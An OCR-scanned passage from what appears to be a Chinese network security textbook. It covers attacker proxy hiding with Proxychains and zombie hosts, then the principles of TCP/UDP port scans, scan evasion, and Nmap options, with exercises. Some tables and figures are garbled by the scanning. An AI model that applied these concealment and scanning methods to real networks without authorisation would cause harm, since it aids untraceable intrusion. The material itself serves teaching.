(4) CCProxy: 国内 出 品 的 Windows 代理 软件 ,配置 简单 ,功能 十 分 强大 ,支持 所 有 
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常见 代理 协议 。 它 支持 正 向 和 反 向 代理 ,但 自身 不 支持 透明 代理 ,需要 与 其 他 工具 如 
SocksCap64 配合 实现 透明 代理 功能 。 图 3-17 给 出 了 反 向 代理 的 配置 示例 ,将 本 地 主机 的 
80 端口 映射 为 “www. jxnu. edu. cn” 的 80 端口 , 当 客 户主 机 输入 “http://192. 168. 2. 103” 访 
问 本 机 的 80 端口 时 ,其 实 是 由 代理 访问 远 端 服务 器 并 把 网 页 返回 给 客户 主机 。 
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图 3-17 CCProxy 反 向 代理 设置 


(5) Squid: 一 个 高 性 能 的 代理 服务 器 ,支持 所 有 常见 代理 协议 ,支持 正 向 、 反 向 和 透 
明代 理 , 可 在 Windows、Linux 和 各 类 UNIX 平台 下 运行 。 和 一 般 的 代理 软件 不 同 ,Squid 
用 一 个 单独 的 ,. 非 模块 化 的 .IO 驱动 的 进程 来 处 理 所 有 的 客户 端 请 求 。 

(6) SocksCap64: Taro Lab 开发 的 一 款 免 费 软件 ,借助 SocksCap64 可 以 使 
Windows 网 络 应 用 程序 通过 Socks 代理 来 访问 网 络 而 不 需要 对 这 些 应 用 程序 做 任何 修 
改 , 即 使 本 身 不 支持 Socks 代理 的 应 用 程序 通过 SocksCaps64 都 可 以 实现 代理 访问 , 它 支 
持 Socks4、Socks5 和 HTTP 协议 。 它 与 其 他 代理 软件 配合 , 即 可 实现 透明 代理 功能 ,用 
户 无 须 做 任何 设置 ,只 需 从 SocksCaps64 中 运行 有 关 程 序 即 可 通过 代理 访问 。 图 3-18 显 
示 了 与 ZAP 代理 配合 访问 “www. jxnu. edu. cn” 的 网 络 连接 情况 。 在 SockCaps64 中 指 
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图 3-18 ”SockCaps64 与 ZAP 代理 配合 产生 透明 代理 的 效果 
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明 ZAP 代理 所 在 位 置 为 “192. 168. 2. 200:8080”, 然 后 从 SockCaps64 中 运行 Chrome 浏 
览 器 程序 访问 “www. jxnu. edu. cn”, 该 域名 对 应 的 IP 是 “202. 101. 194. 153”, 使 用 
“netstat -an” 分 别 读 取 客 户 机 (192. 168. 2. 103) 和 ZAP 主机 (192. 168. 2. 200) 的 TCP 连 
接 , 可 以 看 到 客户 机 的 53777 端口 通过 SockCaps64 自动 连 向 ZAP 主机 的 8080 端口 , 然 
后 ZAP 代理 选择 端口 49168 与 实际 的 服务 器 相连 ,获取 网 页 ,再 返回 给 客户 主机 。 在 此 
过 程 中 ,Chrome 浏览 器 自身 并 没有 配置 任何 代理 服务 器 。 
(7) Proxychains: 与 SocksCap64 功能 类 似 , 人 允许 不 支持 代理 的 应 用 程序 通过 代理 访 
问 ,但 是 比 SocksCap64 强大 得 多 ,因为 它 支持 利用 多 层 代 理 服 务 跳 转 , 并 且 可 以 灵活 选 
择 其 中 的 一 个 或 几 个 代理 ,因此 攻击 者 可 以 动态 选择 多 个 代理 去 访问 目标 主机 。 它 是 一 
款 命 令 行 工 具 , 可 以 在 Linux 和 所 有 UNIX 平台 下 运行 ,支持 HTTP、Socks 4 和 Socks 5 
协议 ,主要 通过 配置 文件 “/etc/proxychains. conf” 进 行 配 置 , 配 置 选项 如 表 3-2 所 列 。 
表 3-2 proxychains 参数 设置 














参数 表示 参数 值 意 义 参数 说 明 
二 数值 ,默认 为 2, 只 有 random_chain a 
chain_len = 配置 生效 时 才 有 效 从 代理 列表 中 随机 选择 代理 的 层 数 
| ，， | 严格 按 代理 列表 中 的 顺序 转发 报 文 ,并 且 
strict_chain strict_ chain/random _ chain/dynamic_ 所 有 代理 必须 在 线 
chain 只 能 有 一 个 值 生效 
选项 值 


random_chain strict_ chain/random _ chain/dynamic_ | 从 列表 中 随机 选择 代理 
chain 只 能 有 一 个 值 生 效 








dynamic_chain et random _ chain/dynamic_ a trea oly dh mn 
chain 只 能 有 一 个 值 生效 eh 网 ” 
每 行 表示 一 个 代理 ,如 : 格式 为 : type host port [user pass] 
[ProxyList] http 192. 168. 2. 200 8080 分 别 指明 代理 类 型 .IP 地 址 、 端 口号 ,代理 


socks4 192. 168. 2. 103 1080 fguo fguo | 服务 器 的 账号 和 密码 











图 3-19 给 出 了 Proxychains 的 具体 用 法 示例 ,示例 中 使 用 了 两 个 代理 ,一 个 HTTP 
代理 在 “192. 168. 2. 200:8080” 监 听 , 另 一 个 Socks 5 代理 在 “192. 168. 2. 101:1080” 监 听 ， 





图 3-19 Proxychains 示例 
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账号 名 和 密码 均 为 “fguo”。 该 示例 使 用 Proxychains 从 命令 行 调 用 浏览 器 “Iceweasel” 访 
间 江 西 师范 大 学 新 闻 网 站 “202. 101. 194. 153”, 从 Proxychains 打印 的 连接 信息 以 及 使 用 
“netstat -n” 查 看 客户 主机 “192. 168. 2. 200” 的 连接 信息 可 以 清楚 看 到 每 层 代理 的 连接 过 程 ， 
客户 主机 首先 与 Socks 5 代理 建立 连接 (192. 168. 2. 200:37323 一 192. 168. 2. 101:1080) ,然后 
Socks 5 代理 与 HTTP 代理 建立 连接 (192. 168. 2. 101:50455 一 192. 168. 2. 200:8080) ,最 
后 HTTP 代理 访问 目标 主机 (192. 168. 200;49992 一 202. 101. 194. 153:80) 。 结 合 该 工具 
和 网 络 中 的 免费 代理 ,攻击 者 可 以 轻松 实现 “网 络 隐身 ”。 


3.5 其 他 方法 


身份 冒充 是 指 攻击 者 盗用 其 他 用 户 的 账号 进行 攻击 ,管理 员 会 误 以 为 是 真实 用 户 正 
在 访问 ,从 而 推迟 被 管理 员 发 现 真 相 的 时 间 。 上 账户 盗用 的 前 提 是 获得 用 户口 令 或 其 他 证 
明 用 户 身份 的 令 牌 ,可 以 使 用 社会 工程 学 ( 见 2.4 节 )、 网 络 监听 ( 见 2.6 节 ) 或 弱 口 令 扫 描 
( 见 4.4 节 ) 等 方法 来 获取 目标 系统 上 的 用 户 和 口令 。 还 可 以 利用 身份 认证 协议 存在 的 漏 
洞 ,利用 截获 的 已 知 信息 直接 冒充 合法 用 户 访问 目标 系统 。 

使 用 僵尸 主机 (Zombie) 或 “肉鸡 ”( 可 以 被 攻击 者 远程 控制 的 机 器 ) 访 问 目标 主机 , 然 
后 在 访问 结束 时 ,在 Zombie 上 清除 一 切 访 问 痕 迹 , 管 理 员 则 无 法 发 现 真实 攻击 者 的 IP 地 
址 。 攻 击 者 也 可 以 利用 Zombie 安装 代理 服务 程序 ,使 用 多 台 Zombie 即 相当 于 多 层 代理 
隐藏 , 极 大 提高 了 攻击 者 的 隐身 性 。 


3.6 小 结 


基于 TCP 连接 的 IP 地 址 欺骗 (IP Spoofing) 难 度 相 对 较 大 ,需要 猜测 目标 主机 的 
TCP ISN 序号 ,而 且 要 对 受害 主机 进行 拒绝 服务 攻击 使 其 无 法 工作 (如 果 受 害 主机 不 在 
线 , 则 无 须 攻 击 )。 冒 充 局 域 网 内 的 其 他 IP 地 址 相对 比较 容易 ( 见 5.2 节 ), 只 有 使 用 加 密 
通信 的 方式 才能 较 好 地 避免 IP 地 址 欺骗 。 

MAC 地 址 欺骗 (MAC spoofing) 只 能 用 在 局 域 网 中 ,主要 用 于 突破 基于 MAC 地 址 
列表 的 访问 控制 方法 。Windows 系统 修改 注册 表 即 可 修改 MAC 地 址 ,Linux 系统 使 用 
ifconfig 命令 或 者 macchanger 工具 可 以 方便 地 修改 和 还 原 。 

网 络 地 址 转换 (NAT) 分 为 端口 地 址 转换 、 动 态 转换 和 苦 态 转换 , 它 使 得 攻击 者 可 以 
将 自己 隐藏 在 众多 的 局 域 网 主机 中 ,避免 被 管理 员 发 现 。NAT 使 用 地 址 转换 表 来 跟踪 
每 条 通信 的 地 址 转换 情况 ,静态 转换 是 在 外 网 向 内 网 发 起 连接 时 登记 转换 表 项 ,其 他 两 种 
都 是 内 网 向 外 网 发 起 连接 时 登记 转换 表 项 。 

代理 隐藏 使 得 攻击 者 可 以 经 过 多 个 代理 主机 转发 报 文 后 ,间接 地 对 目标 主机 进行 访 
间 , 当 代理 主机 的 层 数 较 多 时 ,管理 员 基 本 无 法 回溯 攻击 者 的 实际 IP。 常 见 代理 技术 有 
正 向 代理 、 反 向 代理 .透明 代理 、 匿 名 代理 等 。 攻 击 者 常用 代理 软件 包括 CCProxy、Squid、 
SocksCaps64 和 Proxychains 等 。 

现 有 网 络 隐身 的 各 种 方法 中 ,最 难 追 踪 的 方法 是 多 层 代理 隐藏 结合 Zombie 主机 。 
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因为 Zombie 受 攻击 者 完全 控制 ,攻击 者 完全 可 以 在 攻击 结束 后 彻底 销毁 Zombie 上 记录 
的 任何 信息 ,甚至 破坏 掉 Zombie 的 系统 ,因此 安全 管理 员 根 本 无 法 找到 真实 攻击 者 。 


习 题 


3-1 请 说 明 在 局 域 网 中 如 何 使 用 IP 欺骗 中 断 内 网 一 台 主 机 与 外 网 一 台 具 体 服务 器 
的 TCP 连接 。 

3-2 在 局 域 网 中 ,如 果 两 台 在 线 的 主机 设置 成 相同 的 MAC 地 址 ,它们 是 否 能 同时 
正常 通信 ? 为 什么 ? 

3-3 练习 在 Windows 下 直接 使 用 注册 表 修 改 和 恢复 主机 的 网 卡 地 址 。 

3-4 搭建 包含 三 台 主 机 两 个 局 域 网 的 虚拟 网 络 ,其 中 一 台 Windows Server 2003 或 
2008 作为 NAT 网 关 , 分 别 尝试 配 置 PAT 动态 NAT 和 静态 NAT, 观 察 不 同 网 络 的 主机 
通信 时 ,地 址 转换 表 的 变化 及 各 表 项 的 信息 ,同时 使 用 netstat 命令 观察 三 台 主 机 的 网 络 
连接 情况 并 解释 原因 。 

3-5 ”练习 如 何 配置 CCProxy 作为 正 向 代理 和 反 向 代理 ,并 用 netstat 命令 观察 它们 
的 网 络 连 接 情 况 。 

3-6 应 用 SocksCap64 和 CCProxy 配合 实现 透明 代理 上 网 , 即 浏览 器 无 须 配置 代 
理 , 即 可 通过 CCProxy 上 网 ,使 用 netstat 命令 观察 网 络 连接 情况 ,与 CCProxy 作为 正 向 
代理 时 的 网 络 连接 情况 做 比较 ,并 解释 原因 。 

3-7 ”练习 应 用 Proxychains 和 至 少 两 个 免费 代理 ,实现 多 层 代理 访问 互联 网 。 

3-8 测试 3,4.1 节 提 到 的 代理 程序 ,通过 网 络 监 听 方 法 ,检测 它们 在 代理 HTTP 请 
求 时 ,具体 属于 哪 类 匿名 代理 。 


网 络 扫描 


学 习 要 求 : 

。 掌握 各 种 端口 扫描 技术 的 基本 原理 ,熟练 使 用 端口 扫描 工具 Nmap。 

。 理解 服务 扫描 技术 的 基本 原理 ,学 会 使 用 工具 进行 服务 扫描 。 

。 掌握 操作 系统 扫描 技术 的 基本 原理 ,学 会 使 用 工具 进行 操作 系统 扫描 。 

。 掌握 漏洞 扫描 技术 的 基本 原理 ,熟悉 OpenVAS 对 目标 主机 进行 漏洞 扫描 的 方法 
和 步骤 。 

掌握 弱 口 令 扫描 技术 的 基本 原理 ,熟练 使 用 各 种 弱 口 令 扫 描 工 具 。 

了 解 Web 漏洞 的 基本 定义 和 扫描 技术 原理 。 

了 解 系统 配置 扫描 技术 的 基本 原理 和 实现 方法 ,学 会 使 用 工具 进行 系统 配置 
扫描 。 


网 络 扫描 是 基于 网 络 的 远程 服务 发 现 和 系统 脆弱 点 检测 的 一 种 技术 ,扫描 的 结果 包 
括 目标 主机 开启 的 服务 (以 端口 标记 ) 、 服 务 程序 的 开发 商 和 版 本 号 、 目 标 主 机 的 操作 系统 
类 型 和 版 本 号 、 可 利用 的 服务 程序 漏洞 、 可 利用 的 操作 系统 漏洞 .目标 主机 的 账号 和 口令 、 
服务 程序 的 账号 和 口令 等 敏感 信息 。 网 络 安全 人 员 只 有 收集 到 足够 有 效 的 信息 , 才 有 可 
能 防止 潜在 的 攻击 行为 。 同 时 ,攻击 者 需要 尽 可 能 地 发 现 可 利用 的 薄弱 点 ,才能 实施 攻击 。 
因此 ,网 络 扫描 的 基本 方式 是 首先 扫描 目标 网 络 以 找 出 尽 可 能 多 的 服务 连接 ,然后 扫描 目标 
服务 以 判定 服务 类 型 和 版 本 ,最 后 对 服务 进行 漏洞 扫描 以 确定 是 否 存在 可 利用 的 漏洞 。 

扫描 可 分 为 基于 主机 的 扫描 和 基于 网 络 的 扫描 ,有 时 也 称 为 被 动 式 策略 和 主动 式 策 
略 。 基 于 主机 的 扫描 指 运行 在 被 扫描 主机 之 上 ,对 系统 中 错误 的 配置 .脆弱 的 口令 和 其 他 
不 符合 安全 策略 的 设置 进行 检测 ,此 类 扫描 器 必须 要 具有 系统 访问 权限 ,又 称 作 系统 安全 
扫描 。 基 于 网 络 的 扫描 也 称 为 主动 式 策略 的 安全 扫描 ,指向 远程 主机 发 送 探 测报 文 ,获取 
响应 报 文 并 对 其 进行 解码 分 析 , 从 而 发 现 网 络 或 主机 的 各 种 漏洞 。 

根据 扫描 的 目的 不 同 ,网 络 扫 描 主 要 分 为 端口 扫描 、 类 型 和 版 本 扫描 、 漏 洞 扫描 、 弱 口 
令 扫 描 、Web 漏洞 扫描 和 系统 配置 扫描 等 几 大 类 。 


4.1 端口 扫描 





一 个 端口 开放 即 意 味 着 远程 主机 开启 了 一 个 服务 ,这 可 能 是 一 个 潜在 的 通信 通道 其 
至 是 一 个 入侵 通道 。 端 口 扫描 就 是 找 出 目标 主机 或 目标 设备 开放 的 端口 和 提供 的 服务 ， 
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为 下 一 步 攻 击 做 好 准备 。 它 向 TCP/UDP 服务 端口 发 送 探测 报 文 ,记录 并 分 析 响 应 报 文 
以 判断 目标 端口 处 于 打开 还 是 关闭 状态 ,分 为 TCP 端口 扫描 和 UDP 端口 扫描 两 类 。 
TCP 端口 扫描 包括 全 连接 扫描 (Connect 扫描 )、 半 连接 扫描 (SYN 扫描 )、FIN 扫描 、ACK 
扫描 ,NULL 扫描 ,XMAS 扫描 ,TCP 窗口 扫描 和 自 定义 扫描 等 ,除了 全 连接 扫描 外 ,其 
他 扫描 类 型 都 属于 隐藏 扫描 ,因为 它们 不 会 被 日 志 审 计 系统 发 现 。 除 了 全 连接 和 半 连 接 
扫描 外 ,其 他 TCP 扫描 类 型 的 结果 正确 性 都 依赖 于 具体 操作 系统 的 实现 。UDP 端口 扫 
描 只 有 唯一 一 种 类 型 。 

端口 扫描 方式 包括 慢 速 扫描 和 乱 序 扫描 两 类 。 

(1) 慢 速 扫描 : 对 非 连续 端口 进行 源 地 址 不 一 致 .时 间 间 隔 较 长 .没有 规律 的 扫描 。 

(2) 乱 序 扫描 : 对 连续 端口 进行 源 地 址 一 致 .时 间 间 隔 短 的 扫描 。 


4.1.1 全 连接 扫描 


全 连接 扫描 是 最 基本 的 TCP 扫描 方式 ,也 称 为 TCP Connect 扫描 。 其 实现 原理 
(图 4-1) 是 调用 操作 系统 提供 的 传输 层 接口 API( 如 UNIX 下 的 connect 函数 或 
CAsyncSocket 类 中 的 Connect 方法 ) ,尝试 与 扫描 目标 的 指定 端口 建立 TCP 连接。TCP 
协议 按照 三 路 握手 方式 建立 连接 ,如 果 目 标 端口 处 于 开放 状态 ,会 根据 收 到 的 连接 请 求 
( 带 有 SYN 标记 ) 返 回 带 有 SYN/ACK 标记 的 报 文 ,而 connect 函数 (或 Connect 方法 ) 会 
继续 发 送 确认 报 文 以 完成 三 路 握手 ,最 后 全 连接 扫描 发 送 一 个 RST 标记 的 报 文 来 关闭 刚 
才 建 立 的 TCP 连接 ; 如 果 目 标 端口 处 于 关闭 状态 , 则 根据 TCP 协议 规范 ,目标 会 直接 返 
回 一 个 RST 标记 的 报 文 。 如 果 目 标 端口 受到 防火 墙 保护 , 则 目标 可 能 不 会 返回 任何 
报 文 。 
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(a) 端口 开放 (b) 端口 关闭 (©) 受 防火 墙 保护 
图 4-1 全 连接 扫描 原理 


全 连接 扫描 的 优点 在 于 实现 较 简 单 ,不 需要 任何 特权 用 户 权限 即 可 运行 ; 速度 较 快 ， 
因为 可 以 同时 调用 多 个 连接 函数 从 而 加 速 扫描 。 缺 点 在 于 扫描 目标 的 日 志 中 会 记录 大 量 
的 连接 建立 与 异常 关闭 信息 ,容易 被 管理 员 发 现 。 


4.1.2 半 连 接 扫 描 


所 谓 半 连接 扫描 (SYN 扫描 ) 指 与 目标 的 指定 端口 在 建立 TCP 连接 时 仅 完 成 前 两 次 
握手 ,在 第 三 次 握手 时 ,不 发 送 确认 报 文 .使 得 TCP 连接 无 法 完全 建立 ,因此 称 作 半 连接 
扫描 。 由 于 该 连接 没有 完全 建立 ,所 以 在 日 志文 件 中 不 会 有 记录 。 半 连接 扫描 分 为 SYN 
扫描 和 IP 头 部 Dumb 扫描 两 种 方式 。 

SYN 扫描 (图 4-2) 首 先 向 目标 发 送 连接 请 求 , 当 目标 返回 SYN/ACK 标记 的 报 文 
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时 ,表示 相应 端口 处 于 开放 状态 .由 于 该 连接 请 求 报 文 并 不 是 通过 操作 系统 的 API 函数 
发 出 ,因此 根据 TCP 协议 规范 ,操作 系统 内 核 会 自动 发 出 一 个 带 有 RST 标记 的 报 文 去 断 
开 与 目标 的 连接 。 如 果 目 标 返回 RST 标记 的 报 文 ,表示 目标 端口 处 于 关闭 状态 。 如 果 目 
标 没有 返回 任何 报 文 ,表示 目标 端口 可 能 受到 防火 墙 保护 。 
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(a) 端口 开放 (b) 端口 关闭 (©) 受 防 火 墙 保护 
图 4-2 SYN 扫描 原理 


SYN 扫描 的 优点 在 于 日 志 中 很 少 记录 有 关连 接 尝试 的 信息 ,相对 较 隐 项 。 缺 点 是 实 
现 较 复杂 ,扫描 程序 需要 自行 构造 相应 的 IP 报 文 ,而 且 需 要 超级 用 户 或 者 授权 用 户 权限 ， 
以 调用 相应 的 系统 API 来 实现 。 

IP 头 部 Dumb 扫描 需要 一 台 通 信 量 较 少 的 第 三 方 主机 协助 完成 ,如 图 4-3 所 示 ,A 
对 C 进行 扫描 ,其 中 B 为 Dumb 主机 。 这 种 扫描 方法 允许 对 C 进行 真正 的 TCP 端口 盲 
扫描 , 即 没有 报 文 从 A 的 IP 地 址 发 送 到 目标 C。 该 方法 利用 从 B 得 到 的 IP 报 文 的 ID 序 
列 生成 算法 来 扫描 C 开放 端口 的 信息 。 原 理 如 下 : 

Q@ A 向 B 发 出 连续 的 ICMP( 或 对 关闭 的 端口 发 起 TCP 连接 ?请 求 报 文 , 如 果 B 对 
A 发 出 的 请 求 包 正 常 应 答 的 话 ,A 查看 B 返回 的 报 文 的 IP 头 部 的 ID 信息 ,通常 情况 每 
个 报 文 的 ID 值 会 按 顺 序 加 1( 图 4-3) 。 


TCP/ICMP 报 文 


A B 
检测 IP 头 部 的 ID 标记 © 主机 
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加 A 冒充 B 向 C 的 指定 端口 发 送 连接 请 求 ,C 返回 给 B 的 报 文 有 两 种 可 能 的 结果 : 

。 返回 SYN/ACK 标记 的 报 文 ,表示 端口 处 于 开放 状态 ; 

。 返回 RST 标记 的 报 文 ,表示 端口 处 于 关闭 状态 。 

@A 从 BB 返回 的 ICMP 应 答 ( 或 有 RST 标记 的 TCP) 报 文 的 IP 头 部 的 ID 信息 中 可 
以 观察 到 ,如 果 C 的 端口 开放 , 则 ID 信息 不 是 按 1 递增 ,可 能 以 较 大 数值 递增 ; 如 果 C 的 
端口 关闭 , 则 ID 信息 依然 是 按 顺 序 加 1 ,很 有 规律 。 

该 方法 的 准确 性 依赖 于 B,B 必须 没有 任何 其 他 网 络 通信 ,才能 保证 A 看 到 的 返回 信 
息 是 准确 的 。 
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FIN 扫描 (图 4-4) 不 依赖 TCP 的 三 次 握手 过 程 ,而 是 TCP 的 FIN 标记 。 由 于 TCP 
协议 规定 ,连接 关闭 时 需要 向 对 方 端口 发 送 一 个 设置 了 FIN 标记 的 报 文 表示 数据 发 送 完 
毕 , 如 果 端 口 处 于 关闭 状态 ,系统 会 返回 带 有 RST 标记 的 报 文 ; 如 果 端 口 处 于 打开 状态 
或 者 被 防火 墙 保护 , 则 不 会 返回 任何 报 文 ; 如 果 收 到 ICMP 不 可 达 信息 ,表示 该 端口 被 防 
火 墙 保护 。 


4.1.3 FIN 扫描 















































FIN FIN 
的 RST 标 器 标 
(a) 端口 关闭 (b) 端口 开放 或 受 防火 墙 保 护 


图 4-4 FIN 扫描 原理 


FIN 扫描 相对 更 加 隐蔽 ,但 是 容易 得 出 错误 结论 ,因为 如 果 端 口 开 放 , 那 么 没有 任何 
报 文 返回 ,需要 等 待 超 时 才能 确定 。 如 果 目 标 受到 防火 墙 保护 ,也 不 会 返回 报 文 ,这 时 扫 
描 器 无 法 区 分 到 底 是 被 防火 墙 阻挡 还 是 对 方 端 口 是 打 开 的 。 另 外 ,此 类 方法 与 具体 操作 
系统 的 实现 有 关 , 有 的 系统 不 论 端口 是 否 开放 ,都 会 返回 RST 标记 的 报 文 ,因此 有 时 将 
FIN 扫描 与 SYN 扫描 结合 ,可 以 大 致 判断 目标 操作 系统 的 类 型 。 


4.1.4 ACK 扫描 


ACK 扫描 (图 4-5) 将 发 送 的 报 文 只 设置 ACK 标志 位 ,可 以 用 来 确定 目标 端口 是 否 
被 防火 墙 保护 。 如 果 没 有 被 防火 墙 保护 ,那么 无 论 端口 是 开放 还 是 关闭 ,都 会 返回 RST 
标记 的 报 文 。 如 果 没 有 收 到 任何 报 文 或 者 收 到 ICMP 不 可 达 错 误 报 文 ,那么 可 以 确定 端 
口 受到 防火 墙 保护 。ACK 扫描 也 可 以 用 来 确定 目标 是 否 在 线 , 如 果 收 到 RST 标记 的 报 
文 ,意味 着 目标 一 定 在 线 , 因 为 无 论 该 端口 是 否 开放 均 会 返回 RST 标记 的 报 文 。 














ACK ACK 
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(a) 主机 在 线 (b) 受 防火 墙 保护 (9) 受 防火 墙 保护 


图 4-5 ACK 扫描 原理 
4.1.5 ”NULL 扫描 
NULL 扫描 (图 4-6) 将 发 送 的 报 文中 的 所 有 标记 都 置 为 0, 如果 目标 没有 返回 任何 报 
文 ,表示 端口 处 于 开放 状态 或 者 被 防火 墙 保护 ; 如 果 目 标 返回 RST 标记 的 报 文 , 表 示 端 


口 处 于 关闭 状态 ; 如 果 返 回 ICMP 不 可 达 报 文 ,表示 端口 被 防火 墙 保护 。 与 FIN 扫描 类 
似 , 此 类 方法 与 具体 操作 系统 的 实现 有 关 。 
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扫 无 标记 目 扫 无 标记 目 扫 
描 RST 标 描 | IcMP 不 可 达 | 标 描 
器 器 器 
(a) 端口 关闭 (b) 受 防 火 墙 保护 (c) 端口 开放 或 者 受 防 火 墙 保护 


图 4-6 NULL 扫描 原理 
4.1.6 XMAS 扫描 
XMAS 扫描 (图 4-7) 将 发 送 的 报 文中 的 FIN、URG、PSH 标志 置 为 1, 如 果 目 标 没有 
返回 任何 报 文 ,表示 端口 处 于 开放 状态 或 者 被 防火 墙 保 护 ; 如 果 目 标 返 回 RST 标记 的 报 
文 , 表 示 端 口 处 于 关闭 状态 。 如 果 返 回 ICMP 不 可 达 报 文 ,表示 端口 被 防火 墙 保护 。 与 
FIN 扫描 类 似 , 此 类 方法 与 具体 操作 系统 的 实现 有 关 。 































































扫 | _FINURGPSH .| | 扫 | _FINURGPSH | | 扫 | FINURGPSH,| 上 

描 RST 对 描 ICMP 不 可 达 祭 描 款 

器 器 | 标 器 
(a) 端口 关闭 (b) 受 防火 墙 保护 (0) 端口 开放 或 者 受 防火 墙 保 护 


图 4-7 XMAS 扫 描 原理 
4.1.7 TCP 窗口 扫描 


当 FIN、ACK、NULL 和 XMAS 扫描 返回 RST 标记 的 报 文 时 ,窗口 扫描 (图 4-8) 通 
过 检查 返回 报 文中 的 窗口 值 是 否 为 0 来 判定 端口 是 否 打开 。 有 些 操作 系统 实现 时 ,对 于 
关闭 端口 , 报 文 的 窗口 值 为 0; 而 对 于 打开 端口 , 报 文 窗口 值 为 正 数 。 
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4.1.8 ” 自 定义 扫描 


自 定义 扫描 指 可 以 根据 扫描 的 需要 ,自行 组 合 TCP 的 6 个 标记 位 ,形成 自己 定制 的 
扫描 类 型 ,有 时 可 以 躲避 防火 墙 或 人 侵 检测 系统 ,使 用 自 定 义 扫描 可 以 实现 前 面 列举 的 7 
种 扫描 类 型 。 


4.1.9 UDP 端口 扫描 


UDP 扫描 (图 4-9) 发 送 数据 长 度 为 0 的 UDP 报 文 给 目标 端口 ,如 果 收 到 ICMP 端口 
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不 可 达 信 息 ,表示 目标 端口 是 关闭 的 ; 如 果 收 到 其 他 ICMP 不 可 达 信息 ,表示 该 端口 被 防 
火 墙 保护 。 如 果 收 到 一 个 UDP 响应 报 文 ,表示 该 端口 是 开放 的 。 如 果 几 次 重 试 后 还 没 
有 响应 ,表示 该 端口 是 开放 的 或 者 被 防火 墙 保护 。UDP 扫描 的 挑战 是 怎样 使 它 更 加 快 
速 , 因 为 开放 的 或 被 保护 的 端口 很 少 响应 ,只 有 等 待 超时 然后 继续 发 送 报 文 ,以 防止 偶尔 
的 报 文 丢失 。 由 于 大 部 分 系统 在 默认 情况 下 限制 ICMP 端口 不 可 到 达 消 息 的 发 送 速率 ， 
所 以 只 有 限制 UDP 扫描 的 速率 以 获得 正确 的 扫描 结果 。 






















数据 长 度 为 0 数据 长 度 为 0 数据 长 度 为 0 
扫 | 的 UDP 报 文 目 的 UDP 报 文 目 提 的 UDP 报 文 
标 标 器 
ICMP 端 口 不 可 达 响应 报 文 
(a) 端口 关闭 (b) 端口 开放 (©) 端口 开放 或 受 防火 墙 保 护 


图 4-9 UDP 扫描 原理 
4.1.10 IP 协议 扫描 


IP 协议 扫描 (图 4-10) 指 检测 目标 支持 哪些 IP 协议 ,如 TCP、ICMP、IGMP 等 ,本 质 
上 说 , 它 不 是 端口 扫描 ,因为 它 遍 历 的 是 IP 协议 号 而 不 是 TCP 或 者 UDP 端口 号 。IP 协 
议 扫 描 和 UDP 扫描 类 似 , 它 遍历 IP 协议 头 部 中 表示 协议 类 型 的 8 比特 ,发 送 数据 长 度 为 
0 的 了 P 报 文 。 如 果 收 到 该 协议 的 任何 响应 ,表示 目标 支持 该 协议 ; 如 果 收 到 ICMP 协议 
不 可 到 达 报 文 , 表 示 目 标 不 支持 该 协议 。 如 果 收 到 其 他 ICMP 不 可 达 报 文 或 者 没有 收 到 
任何 报 文 ,表示 目标 受到 防火 墙 保护 。 
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(a) 不 支持 相应 协议 (b) 支持 相应 协议 (©) 受 防火 墙 保护 
图 4-10 协议 扫描 原理 


大 部 分 网 络 防御 软件 都 会 专门 针对 扫描 做 相应 监视 和 检测 ,一旦 发 现 扫描 会 立刻 报 
警 并 拒绝 发 起 扫描 的 主机 IP 的 所 有 连接 请 求 。 因 此 ,在 进行 扫描 时 ,必须 要 注意 尽量 躲 
避 防 御 软件 的 检测 。 常 用 的 躲避 方式 有 : 

(1) 诱饵 隐蔽 扫描 : 将 发 起 扫描 的 主机 隐藏 在 众多 的 诱饵 主机 IP 当中 ,即使 被 防御 
软件 发 现 ,对 方 也 无 法 识别 到 底 是 哪个 IP 正在 进行 扫描 。 

(2) IP 假冒 : 冒充 其 他 IP 地 址 发 起 扫描 。 

(3) 端口 假冒 : 设置 发 起 扫描 的 源 端 口 为 知名 端口 如 80, 使 防御 软件 误 以 为 扫描 报 
文 是 正常 服务 的 应 答 报 文 。 

(4) MAC 地 址 假冒 : 冒充 其 他 主机 的 MAC 地 址 发 起 扫描 ,只 在 局 域 网 中 起 作用 。 


4.1.11 扫描 工具 
端口 扫描 主要 依靠 自动 工具 完成 ,目前 ,端口 扫描 的 经 典 工具 包括 : 


《ED 





网 络 攻防 技术 与 实战 


深入 理解 信息 安全 防护 体系 





(1) Nmap: Network Mapper, 最 佳 端 口 扫描 工具 ,支持 几乎 所 有 操作 系统 ,功能 极其 


强大 ,其 图 形 化 接口 为 Zenmap, 它 支持 
表 4-1, 图 4-11 给 出 了 全 连接 扫描 80 和 


上 述 所 有 扫描 类 型 ,各 类 型 的 扫描 命令 格式 见 
800 端口 的 结果 以 及 Nmap 收发 的 报 文 序列 ， 


图 4-12 给 出 了 IP 头 部 Dumb 扫描 80 端口 的 结果 以 及 Nmap 收发 的 报 文 序列 。 


表 4-1 Nmap 端口 扫描 命令 选项 





-sT 全 连接 扫描 


--scanflags [ACKSYNRSTURGPSHFIN]j] 自 定义 扫描 





-sS SYN 扫描 


-s0 IP 协议 扫描 





-sI dumb _ host: port ID 头 部 Dumb 扫描 
(TCP) 


-p< 端口 范围 > 指明 要 扫描 的 端口 范围 




















-sU UDP 扫描 -下 快速 扫描 (只 扫描 有 限 的 端口 ) 

-sA ACK 扫描 - 按 随 机 的 端口 顺序 扫描 

-sX XMAS 扫描 -sW 窗口 扫描 

-sF FIN 扫描 -O 操作 系统 类 型 扫描 

_sV 服务 版 本 扫描 --version-intensity [0-9] 版 本 探测 包 的 强度 , 越 高 越 容 


易 识 别 





--osscan-guess 匹配 最 接近 的 操作 系统 类 型 


-sR RPC 服务 扫描 


-A 同时 进行 -sV 和 -O 





--osscan-limit 只 对 至 少 有 1 个 打开 和 1 个 关闭 TCP 
端口 的 目标 做 -O 操作 





,101.194.153192.168.2.200 Dam 
68, 3101.10.15 34 > hrtp ce] se 





图 4-11 Nmap 全 连接 扫描 


“202. 101. 194.153” 的 80 和 800 端口 


249; $4 bytes on wire (432 Hts), 34 ytes captured (432 blts) on nterface 0 
0 (74285:09:73: 28;80), Cs; Sc;21:63104:79:64 (Sc:21:68;04:79:64) 
Sre: 192.168.2. 1404 (192.168.2.104), oot: 202.101.194.153 [202.101.194.153) 


00 (oscp 000: Default; ECW: O60: Wot-ECT (Wot ECW-Capable Transpor 








图 4-12 Nmap 工具 的 IP 头 部 Dumb 扫描 效果 
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(2) SuperScan: McAfee 旗下 的 免费 IP 和 端口 扫描 工具 ,速度 极 快 而 且 资 源 占用 
较 小 。 

